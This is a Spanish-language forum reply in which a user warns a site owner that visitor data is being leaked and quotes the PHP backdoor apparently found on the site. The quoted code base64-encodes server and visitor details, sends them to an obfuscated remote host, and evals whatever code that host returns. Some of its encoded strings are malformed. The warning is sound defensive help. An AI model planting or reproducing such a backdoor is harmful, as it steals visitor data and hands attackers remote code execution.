Foros del Web - Ver Mensaje Individual

abimaelrc · #2 (**permalink**) 21/10/2009, 15:51

Alguien esta enviando información de las personas que visitan tu pagina. Te sugiero leer sobre ataques XSS

Código PHP:

Ver original<?PHP
error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"])?
 $_SERVER["HTTP_HOST"]:
 $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?
 $_SERVER["SERVER_NAME"]:
 $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?
 $_SERVER["REQUEST_URI"]:
 $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?
 $_SERVER["PHP_SELF"]:
 $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?
 $_SERVER["QUERY_STRING"]:
 $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?
 $_SERVER["HTTP_REFERER"]:
 $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?
 $_SERVER["HTTP_USER_AGENT"]:
 $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?
 $_SERVER["REMOTE_ADDR"]:
 $REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?
 $_SERVER["SCRIPT_FILENAME"]:
 $SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?
 $_SERVER["HTTP_ACCEPT_LANGUAGE"]:
 $HTTP_ACCEPT_LANGUAGE);
$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);
$f=base64_decode("cnnngrhtddwsawertgfdw==");
if(basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="jhd645der3345692grlosd8985hjhf")
  $f=$_REQUEST["id"];
if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));
elseif($c=file_get_contents(base64_decode("aHghgr665654lkldfd984j").$f.$z))
 eval($c);
else{
 $cu=curl_init(base64_decode("sdfg4456hjy67kifg65==").$f.$z);
 curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
 $o=curl_exec($cu);
 curl_close($cu);
 eval($o);
};
die();
?>